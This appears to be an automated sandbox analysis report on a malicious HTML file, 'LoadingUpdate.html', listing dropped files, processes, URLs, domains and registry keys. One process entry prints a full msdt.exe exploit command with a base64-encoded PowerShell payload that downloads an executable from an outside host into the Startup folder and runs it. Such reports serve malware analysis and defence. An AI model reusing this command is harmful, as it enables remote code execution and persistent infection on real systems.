Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
LoadingUpdate.html
|
HTML document, ASCII text, with very long lines
|
initial sample
|
 |
|
|
C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\01181617-b1e3-4fb4-b4ad-512045402320.tmp
|
ASCII text, with very long lines, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\0ccc7bf9-bc5e-456c-bc65-2bdb9df6e534.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\344610ca-ede2-4137-828c-a10257fe9935.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\432568df-f2af-4c42-b0a4-73020b741599.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\623a3723-9f48-41d3-a9c3-dcbad95bac9c.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\674e0fb7-7ae9-4a8a-b404-70d43c9b391b.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\689920c7-d8b3-4c24-a166-51914cd767fd.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\93c61323-c6d0-4c5b-9ef6-b8d19429c523.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\0551954e-95a4-4973-811c-308c5187d116.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\1244427c-ae0c-452a-9c43-3047da37b04d.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\1aa3331f-9a92-48bc-8a21-030ab1f48cd8.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\34491d4d-83c8-49c3-b1e2-860a0eebaaab.tmp
|
ASCII text, with very long lines, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\602d13b4-5254-453f-983f-2e8c5f1257fb.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\8abbde0a-c30b-4453-b95a-22f0fd1e68bd.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\9c31babc-abd7-4308-b501-e05a799ee159.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\computed_hashes.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (copy)
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\data_1
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Network Persistent
State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\d832a9e9-6c0f-4aad-86b8-f23a5c39b248.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_1
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Persistent
State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\fa1f77dd-04ea-4a3b-821e-a2895ce2595a.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\afe1eedb-7c16-4748-a20e-2289cdd71092.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\b33617e0-379c-4332-94fb-eef6470f2503.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\c58f8324-68ea-4d4d-b158-eb1be5e55772.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\e4c27aba-8faa-4a89-84ff-0fb1b209db71.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ec6db662-83f7-4e0d-87ae-aa2c4a7d2a78.tmp
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ee869dd9-a95d-43f2-9ff0-269dd6831558.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\f76df7b2-289b-4462-83a0-c4275bd939dd.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\b8445bc2-3d13-4a6f-b89d-51424200cef9.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\ca72dea6-97f2-45ce-9cea-14f64883f2ad.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\cb008088-2279-400e-b97f-3bd8dea29770.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\d41134c5-34aa-4add-a8d8-599d6feeae7f.tmp
|
PGP symmetric key encrypted data - Plaintext or unencrypted data salted -
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\e27ad5b9-0bb1-4e05-b718-984b408875b0.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3df09145-9da4-4cd8-b41b-511b982eeaf8.tmp
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\64efcc4e-b623-464e-ab62-55038507fc37.tmp
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_1056626586\Recovery.crx3
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_1056626586\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_1056626586\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_1056626586\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_1781684272\LICENSE
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_1781684272\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_1781684272\crl-set
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_1781684272\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_1781684272\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_574335510\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_574335510\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_574335510\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_592819785\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_592819785\_platform_specific\x86_64\pnacl_public_pnacl_json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_592819785\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_for_eh_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_592819785\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_592819785\_platform_specific\x86_64\pnacl_public_x86_64_crtend_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_592819785\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=7511538a3a6a0b862c772eace49075ed1bbe2377,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_592819785\_platform_specific\x86_64\pnacl_public_x86_64_libcrt_platform_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_592819785\_platform_specific\x86_64\pnacl_public_x86_64_libgcc_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_592819785\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_592819785\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_dummy_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_592819785\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_llc_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=309d6d3d463e6b1b0690f39eb226b1e4c469b2ce,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_592819785\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_sz_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=4b15de4ab227d5e46213978b8518d53c53ce1db9,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_592819785\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7076_592819785\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\3df09145-9da4-4cd8-b41b-511b982eeaf8.tmp
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\bg\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\ca\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\cs\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\da\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\de\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\el\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\en\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\en_GB\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\es\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\es_419\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\et\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\fi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\fil\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\fr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\hi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\hr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\hu\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\id\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\it\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\ja\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\ko\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\lt\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\lv\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\nb\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\nl\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\pl\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\pt_BR\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\pt_PT\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\ro\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\ru\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\sk\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\sl\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\sr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\sv\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\th\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\tr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\uk\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\vi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\zh_CN\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_locales\zh_TW\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\craw_background.js
|
ASCII text, with very long lines
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\craw_window.js
|
ASCII text, with very long lines
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\css\craw_window.css
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\html\craw_window.html
|
HTML document, ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\images\flapper.gif
|
GIF image data, version 89a, 30 x 30
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\images\icon_128.png
|
PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\images\icon_16.png
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\images\topbar_floating_button.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\images\topbar_floating_button_close.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\images\topbar_floating_button_hover.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\images\topbar_floating_button_maximize.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\images\topbar_floating_button_pressed.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7076_1083078156\CRX_INSTALL\manifest.json
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 123 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\LoadingUpdate.html
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1552,12279026980299712606,8640374178074890880,131072
--lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1944 /prefetch:8
|
||
|
C:\Windows\System32\msdt.exe
|
"C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JFN0YXJ0VXA9IiRFbnY6VVNFUlBST0ZJTEVcQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cCI7IEludm9rZS1XZWJSZXF1ZXN0IGh0dHBzOi8vdXBkYXRlYmthdi5jZjo4MDgwL0NoaW1MYWNVcGRhdGUuZXhlIC1PdXRGaWxlICRTdGFydFVwXENoaW1MYWNVcGRhdGUuZXhlOyBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAkU3RhcnRVcFxDaGltTGFjVXBkYXRlLmV4ZTsg'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://dns.google
|
unknown
|
||
|
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
|
unknown
|
||
|
https://www.google.com/intl/en-US/chrome/blank.html
|
unknown
|
||
|
https://ogs.google.com
|
unknown
|
||
|
https://www.google.com/images/cleardot.gif
|
unknown
|
||
|
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1
|
142.250.203.110
|
||
|
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
|
172.217.168.45
|
||
|
https://payments.google.com/payments/v4/js/integrator.js
|
unknown
|
||
|
https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
|
unknown
|
||
|
https://sandbox.google.com/payments/v4/js/integrator.js
|
unknown
|
||
|
https://www.google.com/images/x2.gif
|
unknown
|
||
|
https://accounts.google.com/MergeSession
|
unknown
|
||
|
http://llvm.org/):
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://www.google.com/images/dot2.gif
|
unknown
|
||
|
https://code.google.com/p/nativeclient/issues/entry%s:
|
unknown
|
||
|
https://code.google.com/p/nativeclient/issues/entry
|
unknown
|
||
|
https://accounts.google.com
|
unknown
|
||
|
https://clients2.googleusercontent.com
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://www.google.com/accounts/OAuthLogin?issueuberauth=1
|
unknown
|
||
|
https://www.google.com/
|
unknown
|
||
|
https://www-googleapis-staging.sandbox.google.com
|
unknown
|
||
|
https://chromium.googlesource.com/a/native_client/pnacl-clang.git
|
unknown
|
||
|
https://clients2.google.com
|
unknown
|
||
|
https://clients2.google.com/service/update2/crx
|
unknown
|
There are 16 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
accounts.google.com
|
172.217.168.45
|
||
|
clients.l.google.com
|
142.250.203.110
|
||
|
clients2.google.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.217.168.45
|
accounts.google.com
|
United States
|
||
|
192.168.2.1
|
unknown
|
unknown
|
||
|
239.255.255.250
|
unknown
|
Reserved
|
||
|
142.250.203.110
|
clients.l.google.com
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
ahfgeienlihckogmohjhadlkjgocpleb
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gdaefkejpgkiemlaofpalmlakkmbjdnl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gfdkimpbcpahaombhbimeihdjnejgicl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
kmendfapggjehodndflmmgagdbamhnfd
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mfehgcgbbipciphmccgaenjidiccnmng
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mhjfbmdgcfjbbpaeojofohoefgiehjai
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
neajdppkdcdipfabeoofebfddakdcjhd
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nkeimhogjdpnpccoofpliimaahmaaome
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault
|
S-1-5-21-3853321935-2125563209-4053062332-1002
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gfdkimpbcpahaombhbimeihdjnejgicl
|
||
|
